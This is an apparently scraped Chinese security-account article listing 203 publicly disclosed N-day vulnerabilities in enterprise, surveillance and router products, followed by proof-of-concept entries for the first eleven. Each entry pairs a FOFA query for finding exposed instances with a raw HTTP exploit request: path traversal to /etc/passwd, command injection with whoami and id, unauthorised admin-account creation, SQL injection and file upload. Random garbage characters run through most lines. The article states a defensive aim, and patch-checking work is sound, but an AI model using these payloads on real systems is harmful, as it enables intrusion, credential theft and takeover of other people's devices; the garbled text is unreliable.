互联网公开漏洞整理202309-202406
# M) Z* C* G: X9 j5 o5 \& ?; e3 U道一安全 2024-06-05 07:41 北京
7 H+ j4 i: b/ {5 I6 [; h& c* H以下文章来源于网络安全新视界 ,作者网络安全新视界
9 f4 t( R$ h" a, x; H/ q! x" M- r
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
1 j* ~* R1 y% ]4 N. K7 ~
) E9 ^" P$ b% f: c* ~3 \漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。- b& E& L, s0 ?% @6 I5 n
, L0 ?1 J5 ? C& Z安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
( G; ?8 p5 L! t ]1 E, O
- N/ J, P6 ?4 p: D% i& f文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
! X0 Q8 q( G N w [9 j) {; \$ O' a0 Q- @
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。; |3 A E8 u2 h5 v
" ?5 f& J( ~3 E: ?
( d4 U/ W4 v% q: q; P声明* C- n- o: R4 t9 g' p: ]/ ?
5 I, g7 B* k8 ?4 s0 D6 x* f4 h为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。2 |% b* b) r9 f0 e ?! [8 }% i) Z
( O0 E" T9 p1 _2 y# J6 Y有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。4 A6 y* D2 W4 ]% ^' l' {
" ^. x1 n% [- @( L* ]/ x
3 o# u' V5 {8 }
1 a& a7 u0 X/ d) k- X" a: F3 n目录& v3 ^8 _4 N5 O% w! n% n; Q
4 g! v1 m, M7 j6 o9 h016 F& |, u4 G' r6 P2 Y0 x6 Y% M1 Y# s
1 j2 A- r5 I. n V3 `
1. StarRocks MPP数据库未授权访问
& D# {" r0 L$ Q# d8 v2. Casdoor系统static任意文件读取
/ f0 R1 l/ B# Q3. EasyCVR智能边缘网关 userlist 信息泄漏
" B+ i" {9 z3 z z4. EasyCVR视频管理平台存在任意用户添加1 @9 i$ b, x H
5. NUUO NVR 视频存储管理设备远程命令执行3 ^( |. D" O- O3 ^0 D
6. 深信服 NGAF 任意文件读取$ u% z7 R5 f8 G. `" y
7. 鸿运主动安全监控云平台任意文件下载0 ~+ Y3 R& @/ r2 c G0 `
8. 斐讯 Phicomm 路由器RCE
; U! @% r# K) N. a2 |- w' r Z9. 稻壳CMS keyword 未授权SQL注入
' D) ^- v! B+ W1 x) x10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 \* d, I0 x! ?% O4 [( V; X
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
+ S' Z: M* U) E' ^% A; N1 `; m$ O% O12. Jorani < 1.0.2 远程命令执行5 O3 F$ l0 l2 B9 g
13. 红帆iOffice ioFileDown任意文件读取
# p M- b: K1 [14. 华夏ERP(jshERP)敏感信息泄露
6 E- c6 g. F% {15. 华夏ERP getAllList信息泄露5 \) c8 l# h" j+ ?' x
16. 红帆HFOffice医微云SQL注入
& P6 i' @. W* S, n/ O2 T17. 大华 DSS itcBulletin SQL 注入: c; F6 d, P; r5 ~: S& z# p s2 y
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( t, @: g" ^8 n
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
- |5 m5 G& E% W* v5 x" y. }$ [20. 大华ICC智能物联综合管理平台任意文件读取& g; \( h; z- K) N! n- i8 t' k3 S
21. 大华ICC智能物联综合管理平台random远程代码执行1 L$ H% T, ~1 L$ J
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 V* {! S' C. U; l9 R23. 大华ICC智能物联综合管理平台 fastjson远程代码执行' W+ `4 n* h( \/ v* V# Y
24. 用友NC 6.5 accept.jsp任意文件上传
; a" c) i- J% p9 D- C25. 用友NC registerServlet JNDI 远程代码执行% p0 y6 H0 b0 o1 ^* l: u' g6 \/ c2 Y5 t; s
26. 用友NC linkVoucher SQL注入7 `$ f; R3 Y+ E' |, N! V8 O
27. 用友 NC showcontent SQL注入
. O1 P2 P' P8 @& S% N28. 用友NC grouptemplet 任意文件上传) ^: m$ d! u. \- ~; |
29. 用友NC down/bill SQL注入
. T( B6 ?" P* l30. 用友NC importPml SQL注入
F2 q( \, d) d31. 用友NC runStateServlet SQL注入
2 }) z8 j: W ], I9 ^. a$ b. Z32. 用友NC complainbilldetail SQL注入
?) W" O2 z: N2 G; ?7 t33. 用友NC downTax/download SQL注入
+ o3 `' L% m& ~# B34. 用友NC warningDetailInfo接口SQL注入' u* B, K+ P* k8 v* o, s, L7 Y; |7 }+ s
35. 用友NC-Cloud importhttpscer任意文件上传
) \) Q$ R4 b$ w2 a36. 用友NC-Cloud soapFormat XXE
& n4 L1 S% M0 ~6 S2 }37. 用友NC-Cloud IUpdateService XXE$ O0 S% n8 u1 P! w
38. 用友U8 Cloud smartweb2.RPC.d XXE
$ u/ f' N8 ?- x6 I% o39. 用友U8 Cloud RegisterServlet SQL注入& \4 f+ F) h+ Y7 C
40. 用友U8-Cloud XChangeServlet XXE) R% u2 ?1 ]& C' l# }/ p+ V
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 {# g: x1 q1 R1 c# K42. 用友GRP-U8 SmartUpload01 文件上传
% T7 l" z0 Z, [$ g6 F% o4 T) {43. 用友GRP-U8 userInfoWeb SQL注入致RCE
, V) G( h: j3 w8 E44. 用友GRP-U8 bx_dj_check.jsp SQL注入, e x: g q, {; ^- Z Z+ s
45. 用友GRP-U8 ufgovbank XXE
* X+ b3 m* ?- N' z. E46. 用友GRP-U8 sqcxIndex.jsp SQL注入" M5 s+ A! B) [& w/ F6 t
47. 用友GRP A++Cloud 政府财务云 任意文件读取
9 D' g6 A$ W6 |8 [48. 用友U8 CRM swfupload 任意文件上传$ r1 n6 d0 X( u; {( O7 R% @
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
I$ T# U: q0 ^4 z6 J8 r, B0 k& ?50. QDocs Smart School 6.4.1 filterRecords SQL注入
! w$ g* s8 N$ F. h4 r6 T51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
, y- E/ _1 q6 z52. 泛微E-Office json_common.php sql注入5 p* y5 g7 G' p! X f4 Z
53. 迪普 DPTech VPN Service 任意文件上传" g# N( h/ x. N+ j0 }; \
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
0 ~" c+ [: |3 H1 _3 W+ N, ^' z55. 畅捷通T+ getdecallusers信息泄露
% O: ~9 X( A$ n! \56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- w- E* `3 b& J
57. 畅捷通T+ keyEdit.aspx SQL注入
" N5 g; i8 W |* d! \( j% P58. 畅捷通T+ KeyInfoList.aspx sql注入* |/ m; h: L4 o) T, l7 ?
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行$ b( B! }* i( U E4 D& f
60. 百卓Smart管理平台 importexport.php SQL注入& Z7 h5 E+ s$ y4 Z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
$ B! q5 X% a- g+ ^- e" `% d: v62. IP-guard WebServer 远程命令执行& \$ S! Q( K8 F
63. IP-guard WebServer任意文件读取
$ O `/ L) \" x6 z64. 捷诚管理信息系统CWSFinanceCommon SQL注入2 d* S% l7 W/ G% T4 a4 T
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过2 K8 a! C% I% d7 X: {
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
. d# a# y+ S. X% |9 ?67. 万户ezOFFICE wpsservlet任意文件上传6 Z% r: R e! k) @
68. 万户ezOFFICE wf_printnum.jsp SQL注入
/ v. C6 I, `" H( |( v8 n% D5 ~69. 万户 ezOFFICE contract_gd.jsp SQL注入/ V" T, {; U" i+ j5 H
70. 万户ezEIP success 命令执行+ f4 g( z3 V6 g0 ]* `
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入4 A- Z5 L8 i9 y
72. 致远OA getAjaxDataServlet XXE7 G3 {* P* x* G: R+ J
73. GeoServer wms远程代码执行
. r. n+ e( E8 Q' |$ T74. 致远M3-server 6_1sp1 反序列化RCE
& Q2 f! V% V# X7 C' i75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE6 ^; [" L* C) O2 s$ m6 |1 z3 `
76. 新开普掌上校园服务管理平台service.action远程命令执行! b4 S5 U E; K2 b1 ]
77. F22服装管理软件系统UploadHandler.ashx任意文件上传; X( `6 I8 j- p2 E5 T, F9 t* g: K
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- ^; T' x; U. z& L/ Z
79. BYTEVALUE 百为流控路由器远程命令执行# s" d; ?5 I* d
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传4 l6 q! W: R( g4 n% }2 T! P- G r
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露! {% Z$ s( q& B) r! [ X
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
( {6 }7 {7 K/ k$ L5 |/ X83. JeecgBoot testConnection 远程命令执行" Y. e2 c+ k" |; C
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入! Q: P1 P0 ? Y$ Y; R" ^' c+ f
85. SysAid On-premise< 23.3.36远程代码执行
' @1 }, t! K8 E86. 日本tosei自助洗衣机RCE3 T6 N! ` j) E. |/ s. k0 J2 Y
87. 安恒明御安全网关aaa_local_web_preview文件上传
- k. k8 g( A4 |7 M2 ~/ _88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行8 K$ x% b7 A2 g, u
89. 致远互联FE协作办公平台editflow_manager存在sql注入
: Z/ B3 z% Q: b9 H90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
4 ` A4 R b. K- |91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取" N% [7 b* m% Z: d8 U/ ?
92. 海康威视运行管理中心session命令执行- Z& g" T* e- X4 v3 v
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
, N. F+ n M ~8 e( H4 T94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
- q9 B' a8 f- f7 [$ E& R95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
. I- R3 w" ^$ z" P& I- ?3 i96. Apache OFBiz 18.12.11 groovy 远程代码执行1 F) H& A; v1 f9 |
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
! M7 `; O" `% z98. SpiderFlow爬虫平台远程命令执行
# ?# S' ?. S/ D$ l1 u99. Ncast盈可视高清智能录播系统busiFacade RCE
8 G- B7 w9 h$ C$ J" u100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
+ y: ]4 r5 Z& L3 e0 \& k; x: p! |, s F101. ivanti policy secure-22.6命令注入9 p" S6 ]# x6 E* k: r9 q
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行1 I( S; R5 |' `- [# R4 b; l6 h& U
103. Ivanti Pulse Connect Secure VPN XXE
! L3 L% ~/ { _3 e9 w3 w# c104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
9 L6 s4 q- d V2 n# H" w3 F105. SpringBlade v3.2.0 export-user SQL 注入. n Q. N+ p* d( h& x
106. SpringBlade dict-biz/list SQL 注入
9 J, ~' X a; q0 E' Z) V( v! A& J107. SpringBlade tenant/list SQL 注入, U+ _+ @; E$ h9 w
108. D-Tale 3.9.0 SSRF
. K6 ?( ~) \4 N4 V5 y109. Jenkins CLI 任意文件读取
5 I4 S7 j, t" _$ I% m. m110. Goanywhere MFT 未授权创建管理员0 R6 V; F4 E5 M8 v$ S0 A
111. WordPress Plugin HTML5 Video Player SQL注入+ q7 N! e: H$ }' D# s8 [
112. WordPress Plugin NotificationX SQL 注入
. `* I4 d( q0 H113. WordPress Automatic 插件任意文件下载和SSRF
1 U& N/ R* W7 I114. WordPress MasterStudy LMS插件 SQL注入
: g. y O, N9 B9 e% @3 @0 L; \6 k- y115. WordPress Bricks Builder <= 1.9.6 RCE
; @6 Q# G9 t8 V' D3 p0 E! a6 @116. wordpress js-support-ticket文件上传
6 H3 I- x) x: E7 ? I9 [117. WordPress LayerSlider插件SQL注入
`- ]* D0 n3 \, Q! u118. 北京百绰智能S210管理平台uploadfile.php任意文件上传6 i& u# X8 O, l! A9 g' [8 W+ z7 S
119. 北京百绰智能S20后台sysmanageajax.php sql注入
( e1 d) _) B7 c/ g2 s# c120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 p0 }6 t' l) M' A; U+ z121. 北京百绰智能S42管理平台userattestation.php任意文件上传
# j9 Q' }: r& J4 [8 D2 }" P122. 北京百绰智能s200管理平台/importexport.php sql注入
4 t" Z' h$ [/ l, b$ k123. Atlassian Confluence 模板注入代码执行1 [. k) z$ Q2 ~. A2 k' e0 a, G' _
124. 湖南建研工程质量检测系统任意文件上传7 S8 R' ^ `' \$ D: m3 {
125. ConnectWise ScreenConnect身份验证绕过1 R" h) o, \; L( p; V' J9 Z
126. Aiohttp 路径遍历
! Y( A. r8 j _% s% X* T127. 广联达Linkworks DataExchange.ashx XXE! `$ V+ h& _ Z! ~7 |: z. U/ w
128. Adobe ColdFusion 反序列化
) T; Z, ^- V+ t129. Adobe ColdFusion 任意文件读取$ B1 h& _$ F% z4 D4 t( Y
130. Laykefu客服系统任意文件上传) x2 h8 C& ^1 ^- ~7 x
131. Mini-Tmall <=20231017 SQL注入
: ^% q* ^8 J0 n J C* }132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
+ U1 F/ j9 p* N133. H5 云商城 file.php 文件上传
$ \1 U5 H6 Z" {/ \, y134. 网康NS-ASG应用安全网关index.php sql注入5 h; k$ s' z- g6 ^$ O9 H' `; G
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入0 G0 s# h! M) F5 x# H# G
136. NextChat cors SSRF
5 I0 W, K0 e; y+ f2 k137. 福建科立迅通信指挥调度平台down_file.php sql注入
6 P0 R( M! [/ L `$ M: i6 O9 I138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, s" a5 o) d# k' k$ t X
139. 福建科立讯通信指挥调度平台editemedia.php sql注入/ }2 {+ P- b7 p& G
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入. w ~6 Z6 z2 G; b4 Y5 p( V# y( e
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入0 {0 d, G* O# t7 r$ d
142. CMSV6车辆监控平台系统中存在弱密码
" J& e7 k' `6 W' b9 |! Z: X8 I143. Netis WF2780 v2.1.40144 远程命令执行) H* ^: Q5 ?3 T! Y& u) o: B8 K; [
144. D-Link nas_sharing.cgi 命令注入
7 f0 f2 b5 X. B. q( Z145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
R) q. h1 D/ C. y. F+ z# Y146. MajorDoMo thumb.php 未授权远程代码执行# j( @9 ^3 U6 r9 P. E
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
' B' H( z) j$ g) b* r) k7 M148. CrushFTP 认证绕过模板注入
2 D$ k0 _- R! J3 J1 E, x149. AJ-Report开源数据大屏存在远程命令执行
/ f! D* t5 u8 d8 r9 H150. AJ-Report 1.4.0 认证绕过与远程代码执行. P8 T$ ~- D) G- L$ N
151. AJ-Report 1.4.1 pageList sql注入 k- b7 C8 Z8 ^0 Z% R
152. Progress Kemp LoadMaster 远程命令执行* k+ q! \2 t; o3 m( N
153. gradio任意文件读取" l% {2 d2 ^* f! }7 f! ?
154. 天维尔消防救援作战调度平台 SQL注入
& _) c# m/ j2 x. q& s8 }% S0 [155. 六零导航页 file.php 任意文件上传3 j& m9 H4 k( P9 I8 o( Q% k
156. TBK DVR-4104/DVR-4216 操作系统命令注入
x" ^" Y0 d8 J/ a1 Q& _! H8 q157. 美特CRM upload.jsp 任意文件上传% s0 x+ q) u2 A7 ?: m7 C" r
158. Mura-CMS-processAsyncObject存在SQL注入
& x! U8 d. G g5 D7 p5 _159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
# s/ L2 Q3 G+ @" Q3 r160. Sonatype Nexus Repository 3目录遍历与文件读取
( g; b" |0 j7 O: m3 a0 W* f161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传/ \/ L/ M7 w/ ^ A
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
6 h2 Z7 O+ g- p g: x! R; d163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
$ d: ~/ H6 @4 ?164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ z% V/ ]1 v% M% i
165. OrangeHRM 3.3.3 SQL 注入3 B" k7 F+ i) i
166. 中成科信票务管理平台SeatMapHandler SQL注入
2 E [( ~( w2 D4 R7 r6 G ~167. 精益价值管理系统 DownLoad.aspx任意文件读取
' @5 d( T2 o$ j3 o168. 宏景EHR OutputCode 任意文件读取
4 \, Z S" E9 ]169. 宏景EHR downlawbase SQL注入
1 D* {3 k& D6 @. V9 S z170. 宏景EHR DisplayExcelCustomReport 任意文件读取
c# C$ ^' X6 [! d3 i- d7 L* l: B171. 通天星CMSV6车载定位监控平台 SQL注入
, O/ H! \% v% f& z4 q172. DT-高清车牌识别摄像机任意文件读取
6 X/ J, \# ?$ Z7 F3 \173. Check Point 安全网关任意文件读取
9 T3 O! d3 @+ F' \: Y3 ?& H0 o, j174. 金和OA C6 FileDownLoad.aspx 任意文件读取
. b' F" G/ K# G/ a( t/ `- B- y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
) V" r" v& d/ Z, w; t8 ~$ M+ p176. 电信网关配置管理系统 rewrite.php 文件上传
7 V9 M. O7 G; K: d6 Z" F4 }0 y177. H3C路由器敏感信息泄露 i( b* C# T8 ?2 Z* s
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
- d2 ^* n2 M' Q, ^ b179. 建文工程管理系统存在任意文件读取
9 v @" |* o- J/ N1 v/ n/ m2 _! B180. 帮管客 CRM jiliyu SQL注入 e2 r- }7 A7 Y3 `- e* H' h* R# G
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
9 @" Z- V7 x# k182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
2 ]- y1 l& k4 r. ~$ ?: q0 K& g% O+ }. c183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入- ~) [- y/ K3 M& s( K
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加8 g7 t8 B6 |7 C3 G
185. 瑞友天翼应用虚拟化系统SQL注入
% Z; ~5 \3 x0 F! x$ a, \& t$ D186. F-logic DataCube3 SQL注入6 b/ x3 Q9 p3 c/ @9 Z
187. Mura CMS processAsyncObject SQL注入' N, g- K7 f2 ]3 m" g
188. 叁体-佳会视频会议 attachment 任意文件读取$ B4 S+ p- S7 t# F9 ?
189. 蓝网科技临床浏览系统 deleteStudy SQL注入6 P( \& W% t( k0 c' L
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
. P) g& }" ^ ^, F191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入: S( }2 @4 c! ^! w/ Y' J
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传" p3 [: g& k! m( G* E
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行3 v: y: @" M5 ~ ` z
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
& r. X% m5 [ |2 m$ _7 \0 v195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 y: q$ O: w+ p* J4 x) n
196. 河南省风速科技统一认证平台密码重置# L" V3 k3 f2 \' ^& I' U
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
( s$ F0 n- ]2 O0 X% K r198. 阿里云盘 WebDAV 命令注入) ?' T3 }7 s' }0 {& i
199. cockpit系统assetsmanager_upload接口 文件上传& S9 E8 i7 D. g! x7 j; l# }2 @" _
200. SeaCMS海洋影视管理系统dmku SQL注入
* b* K! Z& _+ g h+ w201. 方正全媒体新闻采编系统 binary SQL注入
* e. C% T* H4 v: c202. 微擎系统 AccountEdit任意文件上传
1 j8 v2 _' T3 c/ E' P7 S203. 红海云EHR PtFjk 文件上传
" l1 r" K6 l- j& \6 v" w/ b7 v& \. p, ^5 y) ^7 X) }
POC列表7 c' g$ @* H$ V+ j% K( \' H6 V
" R; E5 M8 ] y6 w* c
02
/ S/ V) Q- |( @, [8 m& p- x$ R6 j) L m
1. StarRocks MPP数据库未授权访问0 |6 x; R$ x# [) z+ J% _& z% C# ^
FOFA :title="StarRocks"7 p9 X8 {. j4 K* y% U
GET /mem_tracker HTTP/1.1
. U6 }% }) F+ y2 V4 x2 F$ F8 DHost: URL2 p3 @9 C3 A" K: z. q
5 a7 A B6 y; o$ g0 T& ~8 s
% m5 Q, D3 y* K1 `( F3 q. F
2. Casdoor系统static任意文件读取; l4 U, N3 _9 z; z
FOFA :title="Casdoor"9 | O0 h0 C/ M" [! \) D2 n
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
6 t' v" T! b- j* i, }Host: xx.xx.xx.xx:9999
* _0 ]6 |2 n5 rUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' Y5 O# w# @( ^Connection: close
/ v7 S0 p3 f- M2 aAccept: */*
3 _9 r% `. S% Z5 b0 i- FAccept-Language: en" A* {. W2 n0 I& @) {
Accept-Encoding: gzip- _0 L7 G) d' l( x7 ~6 M' U
- o% D+ N4 x! Y# m
4 b$ `: g* B9 r" g3. EasyCVR智能边缘网关 userlist 信息泄漏9 T0 n P+ U8 b0 P
FOFA :title="EasyCVR"
+ P7 l& _) q' aGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1) m, i3 g; @+ c0 u) D* m
Host: xx.xx.xx.xx
# y- L$ d6 B3 R0 D* r2 ^8 }" @7 w5 Z$ }# h1 l) h# ^, P
( a7 }4 O8 R; Q: ]: F4. EasyCVR视频管理平台存在任意用户添加) x% j' c) t4 D) f' d/ b+ r/ N# u
FOFA :title="EasyCVR"
) I2 A; e% G7 [! A' }, v& V
" S, v) m: j4 Opassword更改为自己的密码md5
* o( h" L* H! a0 jPOST /api/v1/adduser HTTP/1.16 ~$ `8 K( O% H) O
Host: your-ip- H, V3 U7 b- x1 V
Content-Type: application/x-www-form-urlencoded; charset=UTF-86 K E- k+ i5 P" C# _: n4 i
# L/ {+ i: i4 A5 S# n! z
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
0 G" Q5 |$ G& o7 r2 o1 }
. e i. _6 |( P L- P+ P9 S
% H, W3 {) b9 C4 q t5. NUUO NVR 视频存储管理设备远程命令执行4 C& s: u0 u( U
FOFA:title="Network Video Recorder Login"
: k3 e' K/ m9 C, a! ~GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: O1 h& B! f' \, F6 P: o2 k' CHost: xx.xx.xx.xx
( m4 ?5 u- B% X) H$ F! P1 o. f
' W% H3 _+ } i* m; M( N
* T' u) P: t6 t- p; U! D F, ~6. 深信服 NGAF 任意文件读取
, ^- g) G% P6 p) n0 mFOFA:title="SANGFOR | NGAF"8 o% x. J; N% N
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
2 ]; X, e4 `' y4 ZHost:
0 L: D8 ]! W9 ]/ O: e6 F5 ~' O. n
]* `9 v) h3 z8 _2 H
7. 鸿运主动安全监控云平台任意文件下载
6 @' l& n+ n& `% N: R" QFOFA:body="./open/webApi.html"" {8 P! i9 F' X# o' s# `) g- ?' g
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.15 h0 @; R+ U- j( A* z
Host:
9 h' P8 `# c4 y2 E) N( P" _" w/ |8 H# s9 ?9 V( f1 C/ Q: ^2 A
* }& X' i8 G0 W4 e8. 斐讯 Phicomm 路由器RCE
" [' v" ?) a8 z- S2 n- cFOFA:icon_hash="-1344736688"
' I% W1 W' v; N6 T8 P \默认账号admin登录后台后,执行操作; B2 k( F) j n' p0 M7 v' ~
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
/ A q3 W) J* t7 l7 ]. [) `Host: x.x.x.x1 M$ F1 A6 I ~4 T) l) D8 J
Cookie: sysauth=第一步登录获取的cookie
* c3 H. \5 B0 M% v6 hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz% B" L9 o; M7 ?. `2 [% z" R, d0 g
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
- U% @* b# o! ~' m$ E+ t1 t3 _! `1 e7 | D. Y$ j
------WebKitFormBoundaryxbgjoytz
9 T6 K, u& C7 ~1 d7 P. c7 e0 ` B/ EContent-Disposition: form-data; name="wifiRebootEnablestatus"3 I! ^- f7 N% Y; m
" h9 c; l8 |" F- I, l& M
%s$ d5 V& J3 Z) `' O
------WebKitFormBoundaryxbgjoytz
8 Z% b# L: s4 j5 ]7 F$ VContent-Disposition: form-data; name="wifiRebootrange"
$ i1 w, _+ P0 w2 l3 t; T6 i9 Z( g* }
12:00; id;% v. F0 a4 E" T- I: a' {
------WebKitFormBoundaryxbgjoytz$ ^+ p" _: {6 [; Q% {1 X
Content-Disposition: form-data; name="wifiRebootendrange"
$ E0 J5 ^' @' M, M6 `- n- ~) m0 E# b6 G9 @3 C
%s:
2 T4 j/ c, A# b) N------WebKitFormBoundaryxbgjoytz) ?$ m0 r) z% s
Content-Disposition: form-data; name="cururl2"
+ k3 X1 J L! E( c2 h7 f$ ?3 M3 b! ?$ H. x; ~) b: g# b% r, l, N
+ u1 e+ v( s7 [ M
------WebKitFormBoundaryxbgjoytz--0 `1 n" I) O6 r5 s
% ^# v4 m3 @8 C# _# Z: v
, o- }' o# m. o9 b0 i! @9. 稻壳CMS keyword 未授权SQL注入5 H* u e9 t3 Z9 R. J: _9 ~
FOFA:app="Doccms": Z/ O) O, w8 H& B" k; @+ t& [6 g
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
, D4 \5 n' B* ]Host: x.x.x.x
9 B( {, i( }1 b5 F6 y
- Y' h( |& i: z( g Z% t" ~4 [" T5 H
payload为下列语句的二次Url编码
8 @! O q T5 f8 f' B) t# {: ?' @5 u
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
4 F0 K0 F+ g6 l) ]
5 T' g; f# u8 ]% }4 ~10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
/ F& z" c2 v6 ?9 nFOFA:icon_hash="953405444"9 o1 B& `. h( c m0 E. N
- F- B8 s5 w% `' A" F( a
文件上传后响应中包含上传文件的路径( m- p' C) V1 b1 E! c1 P
POST /eis/service/api.aspx?action=saveImg HTTP/1.1# R+ d: R; {& k8 s" [
Host: x.x.x.x:xx
7 ?$ }$ Z+ m5 o1 h% ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.360 D! g6 P8 i/ ]8 o: P- f. o3 s# B8 @
Content-Length: 197
2 q& f9 X, q4 Q. B8 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 x8 O; h2 [! A; ]* \& y$ L
Accept-Encoding: gzip, deflate a' T( v& T1 o0 b( L5 [
Accept-Language: zh-CN,zh;q=0.9
5 A/ u% j; w+ T& Q; p1 F4 v/ m: dConnection: close+ H( {. T) M* q8 f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu$ a5 l+ S, b3 ]0 m& J+ }
/ m3 T% l6 S0 @6 o5 A. ?1 \9 ~
------WebKitFormBoundaryxdgaqmqu" d q" H! v1 c9 e u8 R: {
Content-Disposition: form-data; name="file"filename="icfitnya.txt"5 M" I/ ^7 Q1 V# P, `, A7 T, _" x7 }
Content-Type: text/html# {; G, z: u& w e
: s% h5 I/ R: ?8 ?jmnqjfdsupxgfidopeixbgsxbf- E2 V# t: D$ A( |+ ]
------WebKitFormBoundaryxdgaqmqu--& Y% _# v( }+ ?; v3 y) w! o) E
; _% `: X7 G5 G, v; g6 j! F8 l- N# @/ n0 H
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
# e3 h! `; k8 U. ]) }; DFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
' R1 S, I' d, l7 G0 j: xGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
" P3 m8 p8 J6 E/ x- cHost: 127.0.0.1
( p8 E- a$ P" x% `2 M# KPragma: no-cache
